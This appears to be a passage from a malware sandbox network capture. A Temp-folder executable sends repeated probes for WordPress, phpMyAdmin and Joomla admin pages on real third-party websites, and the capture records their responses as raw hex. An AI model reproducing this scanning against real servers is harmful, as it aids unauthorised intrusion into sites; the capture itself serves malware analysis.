                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.911653042 CET1286INData Raw: 4e 49 39 83 e3 9c 92 11 73 14 a6 60 70 a4 7e d4 b9 31 09 2a 13 6f dc 97 51 de 4c 2f 6a d1 e9 32 97 26 2f 8e e1 58 dd e6 c7 24 5a 43 bf 43 60 2c ee 65 52 6c 76 65 9a 7c 0a 7c de f6 ac df a6 44 2e 94 03 2e d2 79 c0 90 53 d6 0d 4c 1c 54 36 28 71 91
                                                                                                                                                                                                                                                                                                                                Data Ascii: NI9s`p~1*oQL/j2&/X$ZCC`,eRlve||D..ySLT6(q<\D:?705[YF~P>-N5/j%f!r3:lz9=vC2pxZqEI!NeteKiuvt'&Q$l3EU
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.911801100 CET1286INData Raw: b3 e7 ac a4 8c c4 61 57 37 a7 76 cf 9c 02 d4 2f 34 5f 6b c3 ca 26 1a 88 ab 31 33 bd 2e d4 19 83 d3 b5 5a 0d 21 cd d0 b9 a6 a0 35 6b b0 4c 37 18 bd 21 5c 68 eb 36 b6 af d8 90 67 20 00 d0 01 1a c5 26 b6 9c fa 2a b5 d4 87 0e c2 66 b3 b9 2a 38 09 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: aW7v/4_k&13.Z!5kL7!\h6g &*f*8>~.|8F"]@[ORc!9P|49M+P\Z h50()*IbYlm#l7@V5yFoZ{Q)V2SXF$e%F7--jY2
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.911981106 CET1286INData Raw: 5b db 9b fc a2 2a 2a 6f 41 23 7d a7 2e 2a 23 5e 39 ff ae 43 4a 72 a4 d5 5a 92 43 4c 84 19 3d a9 c3 39 8f 41 32 09 c3 3c e7 71 4e cf 5a 89 5f 0e 66 d6 94 05 f3 68 68 f2 0b 69 f7 60 98 c7 f5 bb 4f 86 f6 59 0c 30 aa 8a 5f ad 52 09 6c 25 a9 19 8b 7c
                                                                                                                                                                                                                                                                                                                                Data Ascii: [**oA#}.*#^9CJrZCL=9A2<qNZ_fhhi`OY0_Rl%|I@Fwe*VDQkuX/I8U nkHWx<zjrtAUe ?Fx>`a^!(nU[o<<=di\~gG(| `f-Vz"+zv1Zs
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.912406921 CET260INData Raw: 93 d2 9c 59 70 27 e4 f1 03 cf 5d cf 86 99 54 94 e5 d1 3c e3 1e 9e 9d 65 04 9b 19 b0 ec dc 2f d4 65 7e ae 60 d5 63 a6 ed e1 ce 9d 48 33 7c a9 7a e2 40 b4 05 df 08 6e 57 53 b3 62 c5 aa e9 2f 3d a5 2b 9e cc 37 66 8d 49 0d fb f7 8b d7 7f b8 19 31 12
                                                                                                                                                                                                                                                                                                                                Data Ascii: Yp']T<e/e~`cH3|z@nWSb/=+7fI1-M7g]\U#t /[70(1LL;%t#;E]D5F^p>jAkA


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                104192.168.2.45490246.229.230.4805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.627810955 CET171OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: abatek.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.880831957 CET376INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 4e bb 0e 82 30 14 dd fb 15 57 16 27 b8 f8 18 9b 0e f2 88 24 a8 0c 38 30 02 6d 6c 13 a0 0d ad 18 ff 5e 1e 8b e3 79 1f ba 8b 1f 51 59 15 09 5c cb 5b 0e c5 f3 92 67 11 78 3e 62 96 94 29 62 5c c6 9b 72 0c 42 c4 e4 ee 31 42 a5 eb 3b 46 a5 a8 f9 0c 9c 72 9d 60 e7 f0 04 a9 1e 1b c5 b9 18 28 6e 24 a1 b8 9a 68 a3 f9 77 c9 1d d8 9f 67 46 84 1a 56 e9 37 70 3d ec 1d c8 7a 12 60 c4 d8 2b 6b 95 1e c0 69 a8 db 56 58 0b f8 31 7e a7 5f 6a 08 8c 34 64 91 a4 b2 60 c5 38 89 31 a0 68 96 a5 75 63 6e 5d be 91 1f b2 b4 79 49 d6 00 00 00
                                                                                                                                                                                                                                                                                                                                Data Ascii: MN0W'$80ml^yQY\[gx>b)b\rB1B;Fr`(n$hwgFV7p=z`+kiVX1~_j4d`81hucn]yI
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.884970903 CET208OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: abatek.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Referer: http://abatek.sk/wp-login.php
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.145060062 CET438INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:30 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: http://www.abatek.sk/wp-admin/
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                Content-Length: 196
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 6d 8e bd 0e 82 40 10 84 7b 9e 62 a5 87 15 ed cc 7a 85 82 d1 44 94 e2 2c 2c 0f 6f cd 11 39 20 78 4a 78 7b f9 69 2d 67 e6 db 99 a5 45 7c dd cb 7b 96 c0 51 a6 67 c8 6e bb f3 69 0f 7e 80 78 4a e4 01 31 96 f1 9c ac c2 25 62 72 f1 85 47 c6 d9 52 90 61 a5 07 e1 0a 57 b2 58 2f 23 48 eb 2f 6b c8 b8 b5 aa e2 ca 95 3d e1 1c 7a 84 13 4c 79 ad fb f1 3e 12 7f d8 c1 f5 a8 11 d2 30 e8 fa f1 b1 83 0d 46 bd c1 4e 28 29 30 2d 3f b7 be 71 ae d9 20 76 5d 17 aa 5c 39 7e 85 ef 17 76 4d a0 b4 2d 2a f4 85 e1 96 09 95 08 09 9b 71 79 da 1c da c7 9f bd 1f 71 38 08 a6 ee 00 00 00
                                                                                                                                                                                                                                                                                                                                Data Ascii: m@{bzD,,o9 xJx{i-gE|{Qgni~xJ1%brGRaWX/#H/k=zLy>0FN()0-?q v]\9~vM-*qyq8


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                105192.168.2.45490346.229.230.4805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.628106117 CET171OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: abatek.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.881557941 CET376INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 4e bb 0e 82 30 14 dd fb 15 57 16 27 b8 f8 18 9b 0e f2 88 24 a8 0c 38 30 02 6d 6c 13 a0 0d ad 18 ff 5e 1e 8b e3 79 1f ba 8b 1f 51 59 15 09 5c cb 5b 0e c5 f3 92 67 11 78 3e 62 96 94 29 62 5c c6 9b 72 0c 42 c4 e4 ee 31 42 a5 eb 3b 46 a5 a8 f9 0c 9c 72 9d 60 e7 f0 04 a9 1e 1b c5 b9 18 28 6e 24 a1 b8 9a 68 a3 f9 77 c9 1d d8 9f 67 46 84 1a 56 e9 37 70 3d ec 1d c8 7a 12 60 c4 d8 2b 6b 95 1e c0 69 a8 db 56 58 0b f8 31 7e a7 5f 6a 08 8c 34 64 91 a4 b2 60 c5 38 89 31 a0 68 96 a5 75 63 6e 5d be 91 1f b2 b4 79 49 d6 00 00 00
                                                                                                                                                                                                                                                                                                                                Data Ascii: MN0W'$80ml^yQY\[gx>b)b\rB1B;Fr`(n$hwgFV7p=z`+kiVX1~_j4d`81hucn]yI
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.886637926 CET208OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: abatek.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Referer: http://abatek.sk/wp-login.php
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.145323992 CET438INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:30 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: http://www.abatek.sk/wp-admin/
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                Content-Length: 196
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 6d 8e bd 0e 82 40 10 84 7b 9e 62 a5 87 15 ed cc 7a 85 82 d1 44 94 e2 2c 2c 0f 6f cd 11 39 20 78 4a 78 7b f9 69 2d 67 e6 db 99 a5 45 7c dd cb 7b 96 c0 51 a6 67 c8 6e bb f3 69 0f 7e 80 78 4a e4 01 31 96 f1 9c ac c2 25 62 72 f1 85 47 c6 d9 52 90 61 a5 07 e1 0a 57 b2 58 2f 23 48 eb 2f 6b c8 b8 b5 aa e2 ca 95 3d e1 1c 7a 84 13 4c 79 ad fb f1 3e 12 7f d8 c1 f5 a8 11 d2 30 e8 fa f1 b1 83 0d 46 bd c1 4e 28 29 30 2d 3f b7 be 71 ae d9 20 76 5d 17 aa 5c 39 7e 85 ef 17 76 4d a0 b4 2d 2a f4 85 e1 96 09 95 08 09 9b 71 79 da 1c da c7 9f bd 1f 71 38 08 a6 ee 00 00 00
                                                                                                                                                                                                                                                                                                                                Data Ascii: m@{bzD,,o9 xJx{i-gE|{Qgni~xJ1%brGRaWX/#H/k=zLy>0FN()0-?q v]\9~vM-*qyq8


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                106192.168.2.45490446.229.230.4805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.628356934 CET171OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: abatek.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.881422043 CET376INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 4e bb 0e 82 30 14 dd fb 15 57 16 27 b8 f8 18 9b 0e f2 88 24 a8 0c 38 30 02 6d 6c 13 a0 0d ad 18 ff 5e 1e 8b e3 79 1f ba 8b 1f 51 59 15 09 5c cb 5b 0e c5 f3 92 67 11 78 3e 62 96 94 29 62 5c c6 9b 72 0c 42 c4 e4 ee 31 42 a5 eb 3b 46 a5 a8 f9 0c 9c 72 9d 60 e7 f0 04 a9 1e 1b c5 b9 18 28 6e 24 a1 b8 9a 68 a3 f9 77 c9 1d d8 9f 67 46 84 1a 56 e9 37 70 3d ec 1d c8 7a 12 60 c4 d8 2b 6b 95 1e c0 69 a8 db 56 58 0b f8 31 7e a7 5f 6a 08 8c 34 64 91 a4 b2 60 c5 38 89 31 a0 68 96 a5 75 63 6e 5d be 91 1f b2 b4 79 49 d6 00 00 00
                                                                                                                                                                                                                                                                                                                                Data Ascii: MN0W'$80ml^yQY\[gx>b)b\rB1B;Fr`(n$hwgFV7p=z`+kiVX1~_j4d`81hucn]yI
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.885514021 CET208OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: abatek.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Referer: http://abatek.sk/wp-login.php
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.145337105 CET438INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:30 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: http://www.abatek.sk/wp-admin/
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                Content-Length: 196
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 6d 8e bd 0e 82 40 10 84 7b 9e 62 a5 87 15 ed cc 7a 85 82 d1 44 94 e2 2c 2c 0f 6f cd 11 39 20 78 4a 78 7b f9 69 2d 67 e6 db 99 a5 45 7c dd cb 7b 96 c0 51 a6 67 c8 6e bb f3 69 0f 7e 80 78 4a e4 01 31 96 f1 9c ac c2 25 62 72 f1 85 47 c6 d9 52 90 61 a5 07 e1 0a 57 b2 58 2f 23 48 eb 2f 6b c8 b8 b5 aa e2 ca 95 3d e1 1c 7a 84 13 4c 79 ad fb f1 3e 12 7f d8 c1 f5 a8 11 d2 30 e8 fa f1 b1 83 0d 46 bd c1 4e 28 29 30 2d 3f b7 be 71 ae d9 20 76 5d 17 aa 5c 39 7e 85 ef 17 76 4d a0 b4 2d 2a f4 85 e1 96 09 95 08 09 9b 71 79 da 1c da c7 9f bd 1f 71 38 08 a6 ee 00 00 00
                                                                                                                                                                                                                                                                                                                                Data Ascii: m@{bzD,,o9 xJx{i-gE|{Qgni~xJ1%brGRaWX/#H/k=zLy>0FN()0-?q v]\9~vM-*qyq8


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                107192.168.2.45490146.229.230.106805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.628521919 CET177OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: eurisproagro.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.885782957 CET405INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 4e bb 0e 82 30 14 dd fb 15 57 16 27 b8 f8 18 9b 0e f2 88 24 a8 0c 38 30 02 6d 6c 13 a0 0d ad 18 ff 5e 1e 8b e3 79 1f ba 8b 1f 51 59 15 09 5c cb 5b 0e c5 f3 92 67 11 78 3e 62 96 94 29 62 5c c6 9b 72 0c 42 c4 e4 ee 31 42 a5 eb 3b 46 a5 a8 f9 0c 9c 72 9d 60 e7 f0 04 a9 1e 1b c5 b9 18 28 6e 24 a1 b8 9a 68 a3 f9 77 c9 1d d8 9f 67 46 84 1a 56 e9 37 70 3d ec 1d c8 7a 12 60 c4 d8 2b 6b 95 1e c0 69 a8 db 56 58 0b f8 31 7e a7 5f 6a 08 8c 34 64 91 a4 b2 60 c5 38 89 31 a0 68 96 a5 75 63 6e 5d be 91 1f b2 b4 79 49 d6 00 00 00
                                                                                                                                                                                                                                                                                                                                Data Ascii: MN0W'$80ml^yQY\[gx>b)b\rB1B;Fr`(n$hwgFV7p=z`+kiVX1~_j4d`81hucn]yI
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.886599064 CET220OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: eurisproagro.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Referer: http://eurisproagro.sk/wp-login.php
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.239439964 CET514INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:30 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/5.6.40
                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=d6o690mbil094htb2qsi5chs57; path=/
                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                Location: http://www.eurisproagro.sk/
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                Content-Length: 20
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                                Data Ascii:


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                108192.168.2.45491192.240.253.3805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.628667116 CET173OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: eurokamen.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.883569956 CET433INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                location: https://eurokamen.sk/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                content-length: 240
                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                x-bver: v2
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 75 72 6f 6b 61 6d 65 6e 2e 73 6b 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://eurokamen.sk/phpmyadmin/">here</a>.</p></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                109192.168.2.454978164.46.121.63805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.628985882 CET182OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: s-kotobuki-s.co.jp
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.924490929 CET503INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                Location: https://s-kotobuki-s.co.jp/administrator/
                                                                                                                                                                                                                                                                                                                                Content-Length: 249
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 2d 6b 6f 74 6f 62 75 6b 69 2d 73 2e 63 6f 2e 6a 70 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://s-kotobuki-s.co.jp/administrator/">here</a>.</p></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                110192.168.2.45495283.167.249.7805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.669603109 CET181OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: kompresory-servis.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.929131031 CET560INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: http://www.kompresory-servis.sk/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                X-SSL: nginx
                                                                                                                                                                                                                                                                                                                                X-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                                                X-Powered-By: BizWebs
